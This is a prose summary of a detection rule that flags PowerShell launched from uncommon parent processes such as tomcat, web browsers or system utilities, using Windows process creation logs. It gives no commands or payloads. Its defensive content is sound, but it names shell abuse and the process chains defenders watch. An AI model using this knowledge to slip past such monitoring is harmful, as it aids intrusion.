This detection rule identifies suspicious PowerShell process executions based on their parent processes. It specifically targets instances where PowerShell is initiated from uncommon or potentially malicious parent processes, which may indicate an abuse of legitimate tools for executing malicious payloads. The rule utilizes Windows process creation logs to pinpoint such activities. The criteria for detection include specific parent processes known to be less frequently associated with PowerShell, as well as certain command line parameters and executable names that suggest misuse. For example, executions initiated from processes like 'tomcat', various web browsers, or system utilities are monitored. The detection is comprehensive in that it examines both the parent image and the characteristics of the PowerShell instance itself. A level of high is assigned due to the potential severity of threats associated with improper PowerShell usage, often linked to a range of attacks including scripts executed during execution and lateral movement within environments. False positives may arise from legitimate scripts that interact with commonly used applications.